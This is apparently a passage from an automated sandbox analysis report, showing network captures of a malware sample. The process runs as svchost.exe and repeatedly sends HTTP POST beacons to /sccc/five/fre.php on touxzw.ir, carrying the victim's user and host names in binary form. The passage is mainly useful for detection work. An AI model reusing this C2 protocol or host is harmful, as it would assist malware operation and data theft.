Feb 20, 2025 03:44:47.367804050 CET	50013	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:47.373626947 CET	80	50013	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:48.129391909 CET	80	50013	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:48.129550934 CET	50013	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:48.129771948 CET	80	50013	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:48.129826069 CET	50013	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:48.135821104 CET	80	50013	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:49.307396889 CET	50027	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:49.312567949 CET	80	50027	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:49.312644005 CET	50027	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:49.314848900 CET	50027	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:49.319931030 CET	80	50027	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:49.319993973 CET	50027	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:49.325037956 CET	80	50027	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:50.017230988 CET	80	50027	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:50.017620087 CET	50027	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:50.017836094 CET	80	50027	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:50.018274069 CET	50027	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:50.023195982 CET	80	50027	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:51.257488012 CET	50041	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:51.262662888 CET	80	50041	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:51.262742043 CET	50041	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:51.264692068 CET	50041	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:51.269745111 CET	80	50041	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:51.269807100 CET	50041	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:51.274940014 CET	80	50041	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:52.086555958 CET	80	50041	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:52.086657047 CET	50041	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:52.086962938 CET	80	50041	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:52.087028980 CET	50041	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:52.091744900 CET	80	50041	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:53.238917112 CET	50053	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:53.244096041 CET	80	50053	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:53.244493961 CET	50053	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:53.246336937 CET	50053	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:53.251389980 CET	80	50053	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:53.251485109 CET	50053	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:53.256541014 CET	80	50053	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:54.030165911 CET	80	50053	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:54.030291080 CET	50053	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:54.031982899 CET	80	50053	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:54.032037973 CET	50053	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:54.035382986 CET	80	50053	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:55.435472965 CET	50056	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:55.440798998 CET	80	50056	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:55.440892935 CET	50056	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:55.442614079 CET	50056	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:55.447711945 CET	80	50056	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:55.447771072 CET	50056	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:55.452848911 CET	80	50056	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:56.235663891 CET	80	50056	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:56.235775948 CET	50056	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:56.236459017 CET	80	50056	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:56.236510038 CET	50056	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:56.242975950 CET	80	50056	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:57.385402918 CET	50057	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:57.390791893 CET	80	50057	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:57.390868902 CET	50057	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:57.392328978 CET	50057	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:57.397478104 CET	80	50057	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:57.397582054 CET	50057	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:57.402654886 CET	80	50057	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:58.216435909 CET	80	50057	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:58.216630936 CET	50057	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:58.218620062 CET	80	50057	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:58.218669891 CET	50057	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:58.222822905 CET	80	50057	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:59.356652975 CET	50058	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:59.361937046 CET	80	50058	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:59.362010956 CET	50058	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:59.363951921 CET	50058	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:59.368994951 CET	80	50058	104.21.64.1	192.168.2.4
Feb 20, 2025 03:44:59.369050026 CET	50058	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:44:59.374082088 CET	80	50058	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:00.181344986 CET	80	50058	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:00.181509972 CET	50058	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:00.182147026 CET	80	50058	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:00.182199955 CET	50058	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:00.186635017 CET	80	50058	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:01.368074894 CET	50059	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:01.373451948 CET	80	50059	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:01.373542070 CET	50059	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:01.390707970 CET	50059	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:01.395821095 CET	80	50059	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:01.395935059 CET	50059	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:01.401072025 CET	80	50059	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:02.154589891 CET	80	50059	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:02.154762030 CET	50059	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:02.154932022 CET	80	50059	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:02.154983044 CET	50059	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:02.160342932 CET	80	50059	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:03.323556900 CET	50060	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:03.329006910 CET	80	50060	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:03.329088926 CET	50060	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:03.330809116 CET	50060	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:03.335886955 CET	80	50060	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:03.336004972 CET	50060	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:03.341087103 CET	80	50060	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:04.175951004 CET	80	50060	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:04.177119970 CET	80	50060	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:04.177292109 CET	50060	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:04.183718920 CET	50060	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:04.188919067 CET	80	50060	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:05.447444916 CET	50061	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:05.452756882 CET	80	50061	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:05.452862978 CET	50061	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:05.454601049 CET	50061	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:05.459819078 CET	80	50061	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:05.459883928 CET	50061	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:05.466892958 CET	80	50061	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:06.106306076 CET	80	50061	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:06.106555939 CET	50061	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:06.106921911 CET	80	50061	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:06.106977940 CET	50061	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:06.111884117 CET	80	50061	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:07.262002945 CET	50062	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:07.267272949 CET	80	50062	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:07.267354965 CET	50062	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:07.269330025 CET	50062	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:07.274444103 CET	80	50062	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:07.274491072 CET	50062	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:07.279577017 CET	80	50062	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:08.243223906 CET	80	50062	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:08.243365049 CET	50062	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:08.243845940 CET	80	50062	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:08.243891954 CET	50062	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:08.248496056 CET	80	50062	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:09.411355019 CET	50063	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:09.417018890 CET	80	50063	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:09.417247057 CET	50063	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:09.418967009 CET	50063	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:09.424988031 CET	80	50063	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:09.425071955 CET	50063	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:09.431243896 CET	80	50063	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:10.160115957 CET	80	50063	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:10.160329103 CET	50063	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:10.160712957 CET	80	50063	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:10.160770893 CET	50063	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:10.165479898 CET	80	50063	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:11.324737072 CET	50064	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:11.330849886 CET	80	50064	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:11.330929995 CET	50064	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:11.332679033 CET	50064	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:11.338383913 CET	80	50064	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:11.338443995 CET	50064	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:11.343576908 CET	80	50064	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:12.131237984 CET	80	50064	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:12.131377935 CET	50064	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:12.131870985 CET	80	50064	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:12.131921053 CET	50064	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:12.136493921 CET	80	50064	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:13.283030987 CET	50065	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:13.288527012 CET	80	50065	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:13.288623095 CET	50065	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:13.290354967 CET	50065	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:13.295434952 CET	80	50065	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:13.295501947 CET	50065	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:13.300592899 CET	80	50065	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:14.083281994 CET	80	50065	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:14.083484888 CET	50065	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:14.083779097 CET	80	50065	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:14.083832979 CET	50065	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:14.088586092 CET	80	50065	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:15.268640041 CET	50066	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:15.276714087 CET	80	50066	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:15.276793003 CET	50066	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:15.278754950 CET	50066	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:15.286535025 CET	80	50066	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:15.286586046 CET	50066	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:15.293909073 CET	80	50066	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:16.100430012 CET	80	50066	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:16.100548983 CET	50066	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:16.101772070 CET	80	50066	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:16.101864100 CET	50066	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:16.105933905 CET	80	50066	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:17.285442114 CET	50067	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:17.290777922 CET	80	50067	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:17.291043043 CET	50067	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:17.293014050 CET	50067	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:17.298113108 CET	80	50067	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:17.298172951 CET	50067	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:45:17.303354979 CET	80	50067	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:18.100327969 CET	80	50067	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:18.101185083 CET	80	50067	104.21.64.1	192.168.2.4
Feb 20, 2025 03:45:18.101249933 CET	50067	80	192.168.2.4	104.21.64.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 20, 2025 03:43:14.427531004 CET	51736	53	192.168.2.4	1.1.1.1
Feb 20, 2025 03:43:14.516443014 CET	53	51736	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 20, 2025 03:43:14.427531004 CET	192.168.2.4	1.1.1.1	0xfffb	Standard query (0)	touxzw.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 20, 2025 03:43:14.516443014 CET	1.1.1.1	192.168.2.4	0xfffb	No error (0)	touxzw.ir	104.21.64.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 03:43:14.516443014 CET	1.1.1.1	192.168.2.4	0xfffb	No error (0)	touxzw.ir	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 03:43:14.516443014 CET	1.1.1.1	192.168.2.4	0xfffb	No error (0)	touxzw.ir	104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 03:43:14.516443014 CET	1.1.1.1	192.168.2.4	0xfffb	No error (0)	touxzw.ir	104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 03:43:14.516443014 CET	1.1.1.1	192.168.2.4	0xfffb	No error (0)	touxzw.ir	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 03:43:14.516443014 CET	1.1.1.1	192.168.2.4	0xfffb	No error (0)	touxzw.ir	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 03:43:14.516443014 CET	1.1.1.1	192.168.2.4	0xfffb	No error (0)	touxzw.ir	104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

touxzw.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:14.527729988 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 176 Connection: close
Feb 20, 2025 03:43:14.532929897 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones210979JONES-PCk0FDD42EE188E931437F4FBE2CzRz2e
Feb 20, 2025 03:43:15.323247910 CET	811	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kq2Gao6aEEVU4YpaEjla0YSI9MrTb3dwHgz3P5hruyZep6sj0a2Bwqn%2FQ%2BdEOyPsIwUePpHFx6ThnmwPq6oisYgBrc%2BSitf6d1Qee7GeJyOIwzsJSjA5lDs3eUM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b25e25fc642eb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:16.473067999 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 176 Connection: close
Feb 20, 2025 03:43:16.479029894 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones210979JONES-PC+0FDD42EE188E931437F4FBE2CeiESo
Feb 20, 2025 03:43:17.388662100 CET	819	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrSMNXPssx75MUalSnsg7GGncYtEB31%2BUEm4TUsGX%2F%2Fd4Dj8SeNW2BMsSm7aMn76e%2BVvjHyUxaCKoGfILgUalKtjSWih0ITWaqbEVErdJDqQ5DsRiIghbG43k58%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b25ef1d0f7ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=124916&min_rtt=124916&rtt_var=62458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:17.446084023 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:17.451575041 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:18.278176069 CET	843	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MyLI3q7%2FAEOJv4GlrNlYTiCQRgiyxnh%2BEoQ1hr9ZIcqWeb3kpwB%2BQJRxH9gRPeJen0HO2Z9bwVoYGx8lg8r4eVI3RZY4LLiFRu6R7mdvmJaU8Nzy5F4u7liCOjo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b25f49d5f8c36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9478&min_rtt=9478&rtt_var=4739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:19.436868906 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:19.442017078 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:20.266947985 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E69wBaMWeoagsgbyqtg2l%2Bh8jjaynx96ZNg8eikSyd%2BZQyE1A9jTtUdRvjSe%2B2PS9UFORklS%2Fw4QEuN3kqsp6vcFNro8fepSUN4Jw5%2Fk6tL4Ya29C%2BzPXQZGAQU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b26011dbb0f49-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:21.766257048 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 20, 2025 03:43:21.771429062 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 03:43:22.574636936 CET	840	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 02:43:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EebD8zQDEF6DmQgpPZsFbuHFK0h8J99uqUNBiXEG9xEolG1yMrnac8C5RlDEY2D5lwGVQg7lNvS9rKDpKiA9rQRCL%2B3lLIx1byJkR8cyDkV%2B5gxc8oNOIPMWlzQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914b260f8f17c477-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	104.21.64.1	80	7080	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 03:43:23.722965956 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
